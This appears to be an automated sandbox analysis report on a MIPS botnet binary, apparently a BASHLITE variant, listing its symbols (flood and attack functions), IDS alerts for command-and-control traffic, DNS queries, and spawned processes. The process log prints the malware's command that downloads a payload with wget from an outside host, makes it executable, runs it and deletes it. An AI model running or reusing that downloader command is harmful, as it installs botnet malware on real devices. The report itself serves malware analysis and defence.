sleep.c	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
socket	.symtab	0x410df0	88	FUNC	<unknown>	DEFAULT	3
socket.c	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
socket_connect	.symtab	0x406380	444	FUNC	<unknown>	DEFAULT	3
sockprintf	.symtab	0x401dd8	344	FUNC	<unknown>	DEFAULT	3
spec_and_mask.4701	.symtab	0x41ece4	16	OBJECT	<unknown>	DEFAULT	5
spec_base.4693	.symtab	0x41ecbc	7	OBJECT	<unknown>	DEFAULT	5
spec_chars.4698	.symtab	0x41ed40	21	OBJECT	<unknown>	DEFAULT	5
spec_flags.4697	.symtab	0x41ed58	8	OBJECT	<unknown>	DEFAULT	5
spec_or_mask.4700	.symtab	0x41ecf4	16	OBJECT	<unknown>	DEFAULT	5
spec_ranges.4699	.symtab	0x41ed04	9	OBJECT	<unknown>	DEFAULT	5
sprintf	.symtab	0x40e460	80	FUNC	<unknown>	DEFAULT	3
sprintf.c	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
srand	.symtab	0x412bdc	172	FUNC	<unknown>	DEFAULT	3
srandom	.symtab	0x412bdc	172	FUNC	<unknown>	DEFAULT	3
srandom_r	.symtab	0x412e80	400	FUNC	<unknown>	DEFAULT	3
stat	.symtab	0x41add0	144	FUNC	<unknown>	DEFAULT	3
stat.c	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
stderr	.symtab	0x460408	4	OBJECT	<unknown>	DEFAULT	11
stdin	.symtab	0x460400	4	OBJECT	<unknown>	DEFAULT	11
stdout	.symtab	0x460404	4	OBJECT	<unknown>	DEFAULT	11
strcasecmp	.symtab	0x41b5b0	108	FUNC	<unknown>	DEFAULT	3
strcasecmp.c	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
strchr	.symtab	0x410460	248	FUNC	<unknown>	DEFAULT	3
strchr.c	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
strchrnul	.symtab	0x417a30	248	FUNC	<unknown>	DEFAULT	3
strchrnul.c	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
strcmp	.symtab	0x410240	44	FUNC	<unknown>	DEFAULT	3
strcmp.c	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
strcoll	.symtab	0x410240	44	FUNC	<unknown>	DEFAULT	3
strcpy	.symtab	0x410370	36	FUNC	<unknown>	DEFAULT	3
strcpy.c	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
strcspn	.symtab	0x417690	144	FUNC	<unknown>	DEFAULT	3
strcspn.c	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
strdup	.symtab	0x41af10	140	FUNC	<unknown>	DEFAULT	3
strdup.c	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
strerror_r	.symtab	0x4105f0	388	FUNC	<unknown>	DEFAULT	3
strlen	.symtab	0x410180	184	FUNC	<unknown>	DEFAULT	3
strlen.c	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
strncpy	.symtab	0x4103a0	188	FUNC	<unknown>	DEFAULT	3
strncpy.c	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
strnlen	.symtab	0x410270	248	FUNC	<unknown>	DEFAULT	3
strnlen.c	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
strpbrk	.symtab	0x417b30	64	FUNC	<unknown>	DEFAULT	3
strpbrk.c	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
strrchr	.symtab	0x417940	160	FUNC	<unknown>	DEFAULT	3
strrchr.c	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
strspn	.symtab	0x4178f0	72	FUNC	<unknown>	DEFAULT	3
strspn.c	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
strstr	.symtab	0x410080	256	FUNC	<unknown>	DEFAULT	3
strstr.c	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
strtok	.symtab	0x4105d0	32	FUNC	<unknown>	DEFAULT	3
strtok.c	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
strtok_r	.symtab	0x4175c0	208	FUNC	<unknown>	DEFAULT	3
strtok_r.c	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
strtol	.symtab	0x413180	28	FUNC	<unknown>	DEFAULT	3
strtol.c	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
sysconf	.symtab	0x41380c	748	FUNC	<unknown>	DEFAULT	3
sysconf.c	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
szprintf	.symtab	0x401d60	120	FUNC	<unknown>	DEFAULT	3
table	.symtab	0x466ef0	240	OBJECT	<unknown>	DEFAULT	15
table.c	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
table_init	.symtab	0x40bfc0	1112	FUNC	<unknown>	DEFAULT	3
table_key	.symtab	0x460390	4	OBJECT	<unknown>	DEFAULT	11
table_lock_val	.symtab	0x40c49c	132	FUNC	<unknown>	DEFAULT	3
table_retrieve_val	.symtab	0x40c520	144	FUNC	<unknown>	DEFAULT	3
table_unlock_val	.symtab	0x40c418	132	FUNC	<unknown>	DEFAULT	3
tcgetattr	.symtab	0x4107e0	176	FUNC	<unknown>	DEFAULT	3
tcgetattr.c	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
tcpFl00d	.symtab	0x40445c	2316	FUNC	<unknown>	DEFAULT	3
tcpcsum	.symtab	0x403884	348	FUNC	<unknown>	DEFAULT	3
time	.symtab	0x40dd60	16	FUNC	<unknown>	DEFAULT	3
time.c	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
times	.symtab	0x4146c0	16	FUNC	<unknown>	DEFAULT	3
times.c	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
toggle_obf	.symtab	0x40c678	552	FUNC	<unknown>	DEFAULT	3
toupper	.symtab	0x40e390	60	FUNC	<unknown>	DEFAULT	3
toupper.c	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
trim	.symtab	0x400c10	492	FUNC	<unknown>	DEFAULT	3
type_codes	.symtab	0x41ed10	24	OBJECT	<unknown>	DEFAULT	5
type_sizes	.symtab	0x41ed28	12	OBJECT	<unknown>	DEFAULT	5
udpfl00d	.symtab	0x403b08	2388	FUNC	<unknown>	DEFAULT	3
uname	.symtab	0x41b550	88	FUNC	<unknown>	DEFAULT	3
uname.c	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
unknown.1326	.symtab	0x41ede0	14	OBJECT	<unknown>	DEFAULT	5
unsafe_state	.symtab	0x460600	20	OBJECT	<unknown>	DEFAULT	11
uppercase	.symtab	0x402b1c	164	FUNC	<unknown>	DEFAULT	3
userID	.symtab	0x4602e8	4	OBJECT	<unknown>	DEFAULT	11
usleep	.symtab	0x413bd0	144	FUNC	<unknown>	DEFAULT	3
usleep.c	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
util.c	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
util_atoi	.symtab	0x40cdc4	968	FUNC	<unknown>	DEFAULT	3
util_fdgets	.symtab	0x40d84c	324	FUNC	<unknown>	DEFAULT	3
util_isalpha	.symtab	0x40d9f8	144	FUNC	<unknown>	DEFAULT	3
util_isdigit	.symtab	0x40db08	104	FUNC	<unknown>	DEFAULT	3
util_isspace	.symtab	0x40da88	128	FUNC	<unknown>	DEFAULT	3
util_isupper	.symtab	0x40d990	104	FUNC	<unknown>	DEFAULT	3
util_itoa	.symtab	0x40d18c	572	FUNC	<unknown>	DEFAULT	3
util_local_addr	.symtab	0x40d6f8	340	FUNC	<unknown>	DEFAULT	3
util_memcpy	.symtab	0x40cca8	164	FUNC	<unknown>	DEFAULT	3
util_memsearch	.symtab	0x40d3c8	292	FUNC	<unknown>	DEFAULT	3
util_strcat	.symtab	0x40cc00	168	FUNC	<unknown>	DEFAULT	3
util_strcmp	.symtab	0x40ca54	288	FUNC	<unknown>	DEFAULT	3
util_strcpy	.symtab	0x40cb74	140	FUNC	<unknown>	DEFAULT	3
util_stristr	.symtab	0x40d4ec	524	FUNC	<unknown>	DEFAULT	3
util_strlen	.symtab	0x40c8a0	116	FUNC	<unknown>	DEFAULT	3
util_strncmp	.symtab	0x40c914	320	FUNC	<unknown>	DEFAULT	3
util_zero	.symtab	0x40cd4c	120	FUNC	<unknown>	DEFAULT	3
vfork	.symtab	0x40dc10	76	FUNC	<unknown>	DEFAULT	3
vivid_bp	.symtab	0x4602e0	4	OBJECT	<unknown>	DEFAULT	11
vseattack	.symtab	0x405850	2492	FUNC	<unknown>	DEFAULT	3
vsnprintf	.symtab	0x40e4b0	252	FUNC	<unknown>	DEFAULT	3
vsnprintf.c	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
w	.symtab	0x464c5c	4	OBJECT	<unknown>	DEFAULT	15
wait4	.symtab	0x4142f0	92	FUNC	<unknown>	DEFAULT	3
wait4.c	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
waitpid	.symtab	0x40de60	28	FUNC	<unknown>	DEFAULT	3
waitpid.c	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
watchdog_maintain	.symtab	0x4008b0	564	FUNC	<unknown>	DEFAULT	3
watchdog_pid	.symtab	0x460c34	4	OBJECT	<unknown>	DEFAULT	15
wcrtomb	.symtab	0x415270	108	FUNC	<unknown>	DEFAULT	3
wcrtomb.c	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
wcsnrtombs	.symtab	0x415320	216	FUNC	<unknown>	DEFAULT	3
wcsnrtombs.c	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
wcsrtombs	.symtab	0x4152e0	64	FUNC	<unknown>	DEFAULT	3
wcsrtombs.c	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
wildString	.symtab	0x4027ec	656	FUNC	<unknown>	DEFAULT	3
write	.symtab	0x40e1a0	88	FUNC	<unknown>	DEFAULT	3
write.c	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
x	.symtab	0x464c50	4	OBJECT	<unknown>	DEFAULT	15
xdigits.3351	.symtab	0x41feb4	17	OBJECT	<unknown>	DEFAULT	5
xstatconv.c	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
y	.symtab	0x464c54	4	OBJECT	<unknown>	DEFAULT	15
z	.symtab	0x464c58	4	OBJECT	<unknown>	DEFAULT	15
zprintf	.symtab	0x401ce8	120	FUNC	<unknown>	DEFAULT	3

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2025-05-10T07:44:14.452773+0200	2839489	ETPRO MALWARE ELF/BASHLITE Variant CnC Server Response	1	92.60.77.69	666	192.168.2.14	40804	TCP
2025-05-10T07:44:30.009024+0200	2839489	ETPRO MALWARE ELF/BASHLITE Variant CnC Server Response	1	92.60.77.69	666	192.168.2.14	40806	TCP
2025-05-10T07:44:45.567267+0200	2839489	ETPRO MALWARE ELF/BASHLITE Variant CnC Server Response	1	92.60.77.69	666	192.168.2.14	40808	TCP
2025-05-10T07:45:01.128396+0200	2839489	ETPRO MALWARE ELF/BASHLITE Variant CnC Server Response	1	92.60.77.69	666	192.168.2.14	40810	TCP
2025-05-10T07:45:16.685783+0200	2839489	ETPRO MALWARE ELF/BASHLITE Variant CnC Server Response	1	92.60.77.69	666	192.168.2.14	40812	TCP
2025-05-10T07:45:32.244307+0200	2839489	ETPRO MALWARE ELF/BASHLITE Variant CnC Server Response	1	92.60.77.69	666	192.168.2.14	40814	TCP
2025-05-10T07:45:47.802021+0200	2839489	ETPRO MALWARE ELF/BASHLITE Variant CnC Server Response	1	92.60.77.69	666	192.168.2.14	40816	TCP
2025-05-10T07:46:03.359580+0200	2839489	ETPRO MALWARE ELF/BASHLITE Variant CnC Server Response	1	92.60.77.69	666	192.168.2.14	40818	TCP
2025-05-10T07:46:18.916025+0200	2839489	ETPRO MALWARE ELF/BASHLITE Variant CnC Server Response	1	92.60.77.69	666	192.168.2.14	40820	TCP
2025-05-10T07:46:34.471654+0200	2839489	ETPRO MALWARE ELF/BASHLITE Variant CnC Server Response	1	92.60.77.69	666	192.168.2.14	40822	TCP
2025-05-10T07:46:50.030885+0200	2839489	ETPRO MALWARE ELF/BASHLITE Variant CnC Server Response	1	92.60.77.69	666	192.168.2.14	40824	TCP
2025-05-10T07:47:05.583817+0200	2839489	ETPRO MALWARE ELF/BASHLITE Variant CnC Server Response	1	92.60.77.69	666	192.168.2.14	40826	TCP
2025-05-10T07:47:21.142814+0200	2839489	ETPRO MALWARE ELF/BASHLITE Variant CnC Server Response	1	92.60.77.69	666	192.168.2.14	40828	TCP
2025-05-10T07:47:36.710664+0200	2839489	ETPRO MALWARE ELF/BASHLITE Variant CnC Server Response	1	92.60.77.69	666	192.168.2.14	40830	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
May 10, 2025 07:44:13.907644033 CEST	40804	666	192.168.2.14	92.60.77.69
May 10, 2025 07:44:14.180100918 CEST	666	40804	92.60.77.69	192.168.2.14
May 10, 2025 07:44:14.180172920 CEST	40804	666	192.168.2.14	92.60.77.69
May 10, 2025 07:44:14.180701971 CEST	40804	666	192.168.2.14	92.60.77.69
May 10, 2025 07:44:14.452773094 CEST	666	40804	92.60.77.69	192.168.2.14
May 10, 2025 07:44:14.452846050 CEST	666	40804	92.60.77.69	192.168.2.14
May 10, 2025 07:44:14.452883005 CEST	666	40804	92.60.77.69	192.168.2.14
May 10, 2025 07:44:14.452902079 CEST	40804	666	192.168.2.14	92.60.77.69
May 10, 2025 07:44:14.725482941 CEST	666	40804	92.60.77.69	192.168.2.14
May 10, 2025 07:44:29.460728884 CEST	40806	666	192.168.2.14	92.60.77.69
May 10, 2025 07:44:29.734508038 CEST	666	40806	92.60.77.69	192.168.2.14
May 10, 2025 07:44:29.734877110 CEST	40806	666	192.168.2.14	92.60.77.69
May 10, 2025 07:44:29.735584021 CEST	40806	666	192.168.2.14	92.60.77.69
May 10, 2025 07:44:30.009023905 CEST	666	40806	92.60.77.69	192.168.2.14
May 10, 2025 07:44:30.009059906 CEST	666	40806	92.60.77.69	192.168.2.14
May 10, 2025 07:44:30.009147882 CEST	666	40806	92.60.77.69	192.168.2.14
May 10, 2025 07:44:30.009265900 CEST	40806	666	192.168.2.14	92.60.77.69
May 10, 2025 07:44:30.009453058 CEST	40806	666	192.168.2.14	92.60.77.69
May 10, 2025 07:44:30.281534910 CEST	666	40806	92.60.77.69	192.168.2.14
May 10, 2025 07:44:30.281616926 CEST	666	40806	92.60.77.69	192.168.2.14
May 10, 2025 07:44:45.020317078 CEST	40808	666	192.168.2.14	92.60.77.69
May 10, 2025 07:44:45.293590069 CEST	666	40808	92.60.77.69	192.168.2.14
May 10, 2025 07:44:45.294245958 CEST	40808	666	192.168.2.14	92.60.77.69
May 10, 2025 07:44:45.294245958 CEST	40808	666	192.168.2.14	92.60.77.69
May 10, 2025 07:44:45.567156076 CEST	666	40808	92.60.77.69	192.168.2.14
May 10, 2025 07:44:45.567266941 CEST	666	40808	92.60.77.69	192.168.2.14
May 10, 2025 07:44:45.567306042 CEST	666	40808	92.60.77.69	192.168.2.14
May 10, 2025 07:44:45.567555904 CEST	40808	666	192.168.2.14	92.60.77.69
May 10, 2025 07:44:45.840439081 CEST	666	40808	92.60.77.69	192.168.2.14
May 10, 2025 07:45:00.581576109 CEST	40810	666	192.168.2.14	92.60.77.69
May 10, 2025 07:45:00.854563951 CEST	666	40810	92.60.77.69	192.168.2.14
May 10, 2025 07:45:00.854969978 CEST	40810	666	192.168.2.14	92.60.77.69
May 10, 2025 07:45:00.854970932 CEST	40810	666	192.168.2.14	92.60.77.69
May 10, 2025 07:45:01.128248930 CEST	666	40810	92.60.77.69	192.168.2.14
May 10, 2025 07:45:01.128396034 CEST	666	40810	92.60.77.69	192.168.2.14
May 10, 2025 07:45:01.128436089 CEST	666	40810	92.60.77.69	192.168.2.14
May 10, 2025 07:45:01.128917933 CEST	40810	666	192.168.2.14	92.60.77.69
May 10, 2025 07:45:01.401910067 CEST	666	40810	92.60.77.69	192.168.2.14
May 10, 2025 07:45:16.138569117 CEST	40812	666	192.168.2.14	92.60.77.69
May 10, 2025 07:45:16.411710978 CEST	666	40812	92.60.77.69	192.168.2.14
May 10, 2025 07:45:16.412070990 CEST	40812	666	192.168.2.14	92.60.77.69
May 10, 2025 07:45:16.412173986 CEST	40812	666	192.168.2.14	92.60.77.69
May 10, 2025 07:45:16.685714960 CEST	666	40812	92.60.77.69	192.168.2.14
May 10, 2025 07:45:16.685782909 CEST	666	40812	92.60.77.69	192.168.2.14
May 10, 2025 07:45:16.685821056 CEST	666	40812	92.60.77.69	192.168.2.14
May 10, 2025 07:45:16.686121941 CEST	40812	666	192.168.2.14	92.60.77.69
May 10, 2025 07:45:16.959036112 CEST	666	40812	92.60.77.69	192.168.2.14
May 10, 2025 07:45:31.697082043 CEST	40814	666	192.168.2.14	92.60.77.69
May 10, 2025 07:45:31.970721006 CEST	666	40814	92.60.77.69	192.168.2.14
May 10, 2025 07:45:31.971307993 CEST	40814	666	192.168.2.14	92.60.77.69
May 10, 2025 07:45:31.971308947 CEST	40814	666	192.168.2.14	92.60.77.69
May 10, 2025 07:45:32.244220018 CEST	666	40814	92.60.77.69	192.168.2.14
May 10, 2025 07:45:32.244307041 CEST	666	40814	92.60.77.69	192.168.2.14
May 10, 2025 07:45:32.244343996 CEST	666	40814	92.60.77.69	192.168.2.14
May 10, 2025 07:45:32.244529963 CEST	40814	666	192.168.2.14	92.60.77.69
May 10, 2025 07:45:32.517103910 CEST	666	40814	92.60.77.69	192.168.2.14
May 10, 2025 07:45:47.254672050 CEST	40816	666	192.168.2.14	92.60.77.69
May 10, 2025 07:45:47.527307034 CEST	666	40816	92.60.77.69	192.168.2.14
May 10, 2025 07:45:47.527884960 CEST	40816	666	192.168.2.14	92.60.77.69
May 10, 2025 07:45:47.527884960 CEST	40816	666	192.168.2.14	92.60.77.69
May 10, 2025 07:45:47.801956892 CEST	666	40816	92.60.77.69	192.168.2.14
May 10, 2025 07:45:47.802021027 CEST	666	40816	92.60.77.69	192.168.2.14
May 10, 2025 07:45:47.802042007 CEST	666	40816	92.60.77.69	192.168.2.14
May 10, 2025 07:45:47.802511930 CEST	40816	666	192.168.2.14	92.60.77.69
May 10, 2025 07:45:48.076380968 CEST	666	40816	92.60.77.69	192.168.2.14
May 10, 2025 07:46:02.811994076 CEST	40818	666	192.168.2.14	92.60.77.69
May 10, 2025 07:46:03.084851027 CEST	666	40818	92.60.77.69	192.168.2.14
May 10, 2025 07:46:03.085248947 CEST	40818	666	192.168.2.14	92.60.77.69
May 10, 2025 07:46:03.085248947 CEST	40818	666	192.168.2.14	92.60.77.69
May 10, 2025 07:46:03.359549046 CEST	666	40818	92.60.77.69	192.168.2.14
May 10, 2025 07:46:03.359580040 CEST	666	40818	92.60.77.69	192.168.2.14
May 10, 2025 07:46:03.359590054 CEST	666	40818	92.60.77.69	192.168.2.14
May 10, 2025 07:46:03.360058069 CEST	40818	666	192.168.2.14	92.60.77.69
May 10, 2025 07:46:03.632971048 CEST	666	40818	92.60.77.69	192.168.2.14
May 10, 2025 07:46:18.369992018 CEST	40820	666	192.168.2.14	92.60.77.69
May 10, 2025 07:46:18.642937899 CEST	666	40820	92.60.77.69	192.168.2.14
May 10, 2025 07:46:18.643259048 CEST	40820	666	192.168.2.14	92.60.77.69
May 10, 2025 07:46:18.643353939 CEST	40820	666	192.168.2.14	92.60.77.69
May 10, 2025 07:46:18.915962934 CEST	666	40820	92.60.77.69	192.168.2.14
May 10, 2025 07:46:18.916024923 CEST	666	40820	92.60.77.69	192.168.2.14
May 10, 2025 07:46:18.916084051 CEST	666	40820	92.60.77.69	192.168.2.14
May 10, 2025 07:46:18.916353941 CEST	40820	666	192.168.2.14	92.60.77.69
May 10, 2025 07:46:19.189392090 CEST	666	40820	92.60.77.69	192.168.2.14
May 10, 2025 07:46:33.925820112 CEST	40822	666	192.168.2.14	92.60.77.69
May 10, 2025 07:46:34.198440075 CEST	666	40822	92.60.77.69	192.168.2.14
May 10, 2025 07:46:34.198817968 CEST	40822	666	192.168.2.14	92.60.77.69
May 10, 2025 07:46:34.198817968 CEST	40822	666	192.168.2.14	92.60.77.69
May 10, 2025 07:46:34.471587896 CEST	666	40822	92.60.77.69	192.168.2.14
May 10, 2025 07:46:34.471653938 CEST	666	40822	92.60.77.69	192.168.2.14
May 10, 2025 07:46:34.471723080 CEST	666	40822	92.60.77.69	192.168.2.14
May 10, 2025 07:46:34.472070932 CEST	40822	666	192.168.2.14	92.60.77.69
May 10, 2025 07:46:34.744934082 CEST	666	40822	92.60.77.69	192.168.2.14
May 10, 2025 07:46:49.483344078 CEST	40824	666	192.168.2.14	92.60.77.69
May 10, 2025 07:46:49.757024050 CEST	666	40824	92.60.77.69	192.168.2.14
May 10, 2025 07:46:49.757416010 CEST	40824	666	192.168.2.14	92.60.77.69
May 10, 2025 07:46:49.757730007 CEST	40824	666	192.168.2.14	92.60.77.69
May 10, 2025 07:46:50.030813932 CEST	666	40824	92.60.77.69	192.168.2.14
May 10, 2025 07:46:50.030884981 CEST	666	40824	92.60.77.69	192.168.2.14
May 10, 2025 07:46:50.030922890 CEST	666	40824	92.60.77.69	192.168.2.14
May 10, 2025 07:46:50.030968904 CEST	40824	666	192.168.2.14	92.60.77.69
May 10, 2025 07:46:50.304476976 CEST	666	40824	92.60.77.69	192.168.2.14
May 10, 2025 07:47:05.037883043 CEST	40826	666	192.168.2.14	92.60.77.69
May 10, 2025 07:47:05.310399055 CEST	666	40826	92.60.77.69	192.168.2.14
May 10, 2025 07:47:05.310899973 CEST	40826	666	192.168.2.14	92.60.77.69
May 10, 2025 07:47:05.310899973 CEST	40826	666	192.168.2.14	92.60.77.69
May 10, 2025 07:47:05.583719969 CEST	666	40826	92.60.77.69	192.168.2.14
May 10, 2025 07:47:05.583817005 CEST	666	40826	92.60.77.69	192.168.2.14
May 10, 2025 07:47:05.583852053 CEST	666	40826	92.60.77.69	192.168.2.14
May 10, 2025 07:47:05.583945990 CEST	40826	666	192.168.2.14	92.60.77.69
May 10, 2025 07:47:05.856759071 CEST	666	40826	92.60.77.69	192.168.2.14
May 10, 2025 07:47:20.595170021 CEST	40828	666	192.168.2.14	92.60.77.69
May 10, 2025 07:47:20.869220972 CEST	666	40828	92.60.77.69	192.168.2.14
May 10, 2025 07:47:20.869477034 CEST	40828	666	192.168.2.14	92.60.77.69
May 10, 2025 07:47:20.869477034 CEST	40828	666	192.168.2.14	92.60.77.69
May 10, 2025 07:47:21.142750025 CEST	666	40828	92.60.77.69	192.168.2.14
May 10, 2025 07:47:21.142813921 CEST	666	40828	92.60.77.69	192.168.2.14
May 10, 2025 07:47:21.142900944 CEST	666	40828	92.60.77.69	192.168.2.14
May 10, 2025 07:47:21.143172979 CEST	40828	666	192.168.2.14	92.60.77.69
May 10, 2025 07:47:21.416692019 CEST	666	40828	92.60.77.69	192.168.2.14
May 10, 2025 07:47:36.159761906 CEST	40830	666	192.168.2.14	92.60.77.69
May 10, 2025 07:47:36.434356928 CEST	666	40830	92.60.77.69	192.168.2.14
May 10, 2025 07:47:36.434753895 CEST	40830	666	192.168.2.14	92.60.77.69
May 10, 2025 07:47:36.434842110 CEST	40830	666	192.168.2.14	92.60.77.69
May 10, 2025 07:47:36.709930897 CEST	666	40830	92.60.77.69	192.168.2.14
May 10, 2025 07:47:36.710664034 CEST	666	40830	92.60.77.69	192.168.2.14
May 10, 2025 07:47:36.710726976 CEST	666	40830	92.60.77.69	192.168.2.14
May 10, 2025 07:47:36.710943937 CEST	40830	666	192.168.2.14	92.60.77.69
May 10, 2025 07:47:36.985866070 CEST	666	40830	92.60.77.69	192.168.2.14

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
May 10, 2025 07:44:14.343796968 CEST	54141	53	192.168.2.14	1.1.1.1
May 10, 2025 07:44:14.343796968 CEST	47099	53	192.168.2.14	1.1.1.1
May 10, 2025 07:44:14.505690098 CEST	53	47099	1.1.1.1	192.168.2.14
May 10, 2025 07:44:14.505877018 CEST	47099	53	192.168.2.14	1.1.1.1
May 10, 2025 07:44:14.518811941 CEST	53	54141	1.1.1.1	192.168.2.14
May 10, 2025 07:44:14.519336939 CEST	54141	53	192.168.2.14	1.1.1.1
May 10, 2025 07:44:14.647154093 CEST	53	47099	1.1.1.1	192.168.2.14
May 10, 2025 07:44:14.660587072 CEST	53	54141	1.1.1.1	192.168.2.14
May 10, 2025 07:46:56.343882084 CEST	36120	53	192.168.2.14	1.1.1.1
May 10, 2025 07:46:56.343945980 CEST	36414	53	192.168.2.14	1.1.1.1
May 10, 2025 07:46:56.486195087 CEST	53	36120	1.1.1.1	192.168.2.14
May 10, 2025 07:46:56.512118101 CEST	53	36414	1.1.1.1	192.168.2.14

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
May 10, 2025 07:44:14.343796968 CEST	192.168.2.14	1.1.1.1	0xfd88	Standard query (0)	gay.energy	A (IP address)	IN (0x0001)	false
May 10, 2025 07:44:14.343796968 CEST	192.168.2.14	1.1.1.1	0xd901	Standard query (0)	gay.energy	28	IN (0x0001)	false
May 10, 2025 07:44:14.505877018 CEST	192.168.2.14	1.1.1.1	0xd901	Standard query (0)	gay.energy	28	IN (0x0001)	false
May 10, 2025 07:44:14.519336939 CEST	192.168.2.14	1.1.1.1	0xfd88	Standard query (0)	gay.energy	A (IP address)	IN (0x0001)	false
May 10, 2025 07:46:56.343882084 CEST	192.168.2.14	1.1.1.1	0x400f	Standard query (0)	daisy.ubuntu.com	A (IP address)	IN (0x0001)	false
May 10, 2025 07:46:56.343945980 CEST	192.168.2.14	1.1.1.1	0x5e92	Standard query (0)	daisy.ubuntu.com	28	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
May 10, 2025 07:44:14.505690098 CEST	1.1.1.1	192.168.2.14	0xd901	Name error (3)	gay.energy	none	none	28	IN (0x0001)	false
May 10, 2025 07:44:14.518811941 CEST	1.1.1.1	192.168.2.14	0xfd88	Name error (3)	gay.energy	none	none	A (IP address)	IN (0x0001)	false
May 10, 2025 07:44:14.647154093 CEST	1.1.1.1	192.168.2.14	0xd901	Name error (3)	gay.energy	none	none	28	IN (0x0001)	false
May 10, 2025 07:44:14.660587072 CEST	1.1.1.1	192.168.2.14	0xfd88	Name error (3)	gay.energy	none	none	A (IP address)	IN (0x0001)	false
May 10, 2025 07:46:56.486195087 CEST	1.1.1.1	192.168.2.14	0x400f	No error (0)	daisy.ubuntu.com		162.213.35.25	A (IP address)	IN (0x0001)	false
May 10, 2025 07:46:56.486195087 CEST	1.1.1.1	192.168.2.14	0x400f	No error (0)	daisy.ubuntu.com		162.213.35.24	A (IP address)	IN (0x0001)	false

System Behavior

Analysis Process: mipsel.elf PID: 5493, Parent PID: 5410

General

Start time (UTC):	05:44:12
Start date (UTC):	10/05/2025
Path:	/tmp/mipsel.elf
Arguments:	/tmp/mipsel.elf
File size:	5773336 bytes
MD5 hash:	0d6f61f82cf2f781c6eb0661071d42d9

Chronological Activities

Analysis Process: mipsel.elf PID: 5495, Parent PID: 5493

General

Start time (UTC):	05:44:12
Start date (UTC):	10/05/2025
Path:	/tmp/mipsel.elf
Arguments:	-
File size:	5773336 bytes
MD5 hash:	0d6f61f82cf2f781c6eb0661071d42d9

Chronological Activities

Analysis Process: sh PID: 5495, Parent PID: 5493

General

Start time (UTC):	05:44:12
Start date (UTC):	10/05/2025
Path:	/bin/sh
Arguments:	/bin/sh -c "wget -q http://gay.energy/.../vivid -O .....;chmod 777 .....;./.....;rm -rf ....."
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Chronological Activities

Analysis Process: sh PID: 5510, Parent PID: 5495

General

Start time (UTC):	05:44:12
Start date (UTC):	10/05/2025
Path:	/bin/sh
Arguments:	-
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Chronological Activities

Analysis Process: wget PID: 5510, Parent PID: 5495

General

Start time (UTC):	05:44:12
Start date (UTC):	10/05/2025
Path:	/usr/bin/wget
Arguments:	wget -q http://gay.energy/.../vivid -O .....
File size:	548568 bytes
MD5 hash:	996940118df7bb2aaa718589d4e95c08

Chronological Activities

Analysis Process: sh PID: 5511, Parent PID: 5495

General

Start time (UTC):	05:44:13
Start date (UTC):	10/05/2025
Path:	/bin/sh
Arguments:	-
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Chronological Activities

Analysis Process: chmod PID: 5511, Parent PID: 5495

General

Start time (UTC):	05:44:13
Start date (UTC):	10/05/2025
Path:	/usr/bin/chmod
Arguments:	chmod 777 .....
File size:	63864 bytes
MD5 hash:	739483b900c045ae1374d6f53a86a279

Chronological Activities

Analysis Process: sh PID: 5512, Parent PID: 5495

General

Start time (UTC):	05:44:13
Start date (UTC):	10/05/2025
Path:	/bin/sh
Arguments:	-
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Chronological Activities

Analysis Process: sh PID: 5512, Parent PID: 5495

General

Start time (UTC):	05:44:13
Start date (UTC):	10/05/2025
Path:	/bin/sh
